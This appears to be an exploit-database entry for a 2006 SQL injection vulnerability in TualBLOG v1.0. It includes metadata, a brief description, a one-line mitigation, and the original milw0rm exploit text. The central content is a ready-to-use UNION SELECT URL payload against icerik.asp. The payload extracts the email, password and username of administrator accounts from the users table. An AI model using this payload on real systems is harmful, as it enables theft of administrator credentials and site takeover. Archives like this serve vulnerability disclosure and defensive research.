header-logo
Suggest Exploit
vendor:
TualBLOG
by:
Dj ReMix
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: TualBLOG
Affected Version From: TualBLOG v 1.0
Affected Version To: TualBLOG v 1.0
Patch Exists: NO
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

TualBLOG v 1.0

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'icerikno' parameter to the '/icerik.asp' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to the application with administrative privileges.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# BiyoSecurity.Org
# script name : TualBLOG v 1.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp

exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1

uyeno = 1 or 2( Admin ID )

# milw0rm.com [2006-09-13]